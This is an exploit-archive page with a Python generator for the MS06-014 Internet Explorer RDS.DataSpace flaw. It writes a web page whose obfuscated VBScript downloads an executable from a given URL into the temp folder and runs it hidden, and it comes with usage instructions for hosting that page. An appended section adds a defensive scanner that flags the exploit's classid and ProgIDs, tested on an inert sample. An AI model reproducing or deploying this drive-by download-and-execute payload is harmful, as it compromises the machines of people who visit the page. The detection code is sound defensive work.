2006-07-22 MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
Rated as : Critical risk
#!/bin/sh -
"exec" "python" "-O" "$0" "$@"

__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVE-2006-0003
MS06-014

April 2006

*** this is a bit out-dated, but works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html

Now upload index.html to the same webserver hosting your
http://omfg.what.ho.st/~user/stage2.exe 

                            - redsand@blacksecurity.org
"""

__version__ = "1.0"

import sys, random

class MS06014:
    
    __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"


    __html = """
    <title></title>
    <head></head>

    <body>

    <script language="VBScript">

    on error resume next

    BL4CK_PAYLOAD

    </script>
    <head>
    <title>[BL4CK] || 404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    pwn3d!!
    <hr>
    <!-- <script>location.href='http://google.com'</script> -->
    </body>

    </html>

    """

    __payload = """

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "URLFILE"

    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1

    ' xml ajax req
    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' Get temp directory and create our destination name
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    ' open adodb stream and write contents of request to file
    ' like vbs dl+exec code
    S.write x.responseBody
    ' Saves it with CreateOverwrite flag
    S.savetofile fname1,2

    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

    """

    def	__init__(self, file):

	self.__file = file



    def bl4ck(self):
	self.__payload = self.__payload.replace("URLFILE",self.__file)

	encoded = self.__payload

	ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

	return ret


if __name__ == '__main__':

	url=False
	out=False

	print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
	print "url path to file must be on the same domain as the htm file"
	print "http://blacksecurity.org\r\n"


	argc = len(sys.argv)
	if(argc <= 2):
        	print "USAGE: %s <download url> <outfile>" % sys.argv[0]
        	sys.exit(0)
	if(argc > 1):
       		url = sys.argv[1]
	if(argc > 2):
        	out = sys.argv[2]

        ms = MS06014(url)

       	ret = ms.bl4ck()


	try:
	    fsock = open(out, "w+", 0)
	    try:
	        fsock.write(ret );
	    finally:
	        fsock.close()
	except IOError:
	    pass

	print "Wrote %r bytes to: %s" % (len(ret),out)
securitydot.net - 2006-07-22
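
Detection-side companion to the generator above, as an added example that is not part of the original exploit or the archive page: a static scanner that flags pages which set the payload's `BD96C556-65A3-11D0-983A-00C04FC29E36` classid and call `CreateObject` on it for the ProgIDs the payload uses. It goes slightly beyond the page by resolving the `a1&a2&a3&a4` style string splitting before matching. The names `scan`, `fold` and `SAMPLE` are assumptions of this example, and the sample is a constructed, inert excerpt.

```python
import re

# CLSID the page's payload assigns to its <object> element (RDS.DataSpace).
RDS_CLSID = "bd96c556-65a3-11d0-983a-00c04fc29e36"
# ProgIDs the payload asks that object to instantiate.
RISKY_PROGIDS = {"microsoft.xmlhttp", "adodb.stream",
                 "scripting.filesystemobject", "shell.application"}

ASSIGN = re.compile(r'^\s*(?:set\s+)?(\w+)\s*=\s*(.+?)\s*$', re.I)
CREATE = re.compile(r'\.createobject\s*\(\s*([^,)]+)', re.I)
TOKEN = re.compile(r'"([^"]*)"|(\w+)')

def fold(expr, env):
    """Resolve literals/known variables joined by & or +; None for anything else."""
    out = []
    for part in re.split(r'\s*[&+]\s*', expr.strip()):
        m = TOKEN.fullmatch(part)
        if m is None or (m.group(1) is None and m.group(2).lower() not in env):
            return None
        out.append(m.group(1) if m.group(1) is not None else env[m.group(2).lower()])
    return "".join(out)

def scan(html):
    env, progids = {}, set()          # VBScript names are case-insensitive
    for line in html.splitlines():
        m = ASSIGN.match(line)
        if m and (val := fold(m.group(2), env)) is not None:
            env[m.group(1).lower()] = val
        for arg in CREATE.findall(line):
            val = fold(arg, env)
            if val and val.lower() in RISKY_PROGIDS:
                progids.add(val.lower())
    # Check the raw page and every folded string, so a split CLSID is caught too.
    texts = [html.lower()] + [v.lower() for v in env.values()]
    clsid = any(RDS_CLSID in t for t in texts)
    return {"rds_clsid": clsid, "progids": sorted(progids),
            "suspicious": clsid and bool(progids)}

# Constructed, inert sample: object creation only, no download or execution.
SAMPLE = '''Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str = "Microsoft.XMLHTTP"
Set x = df.CreateObject(str, "")
a1 = "Adodb."
a2 = "Stream"
str1 = a1&a2
set S = df.createobject(str1, "")'''

if __name__ == "__main__": print(scan(SAMPLE))
```

The scanner works line by line and does not follow VBScript `_` line continuations or `:` statement separators, so treat a clean result as the absence of this specific pattern only.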
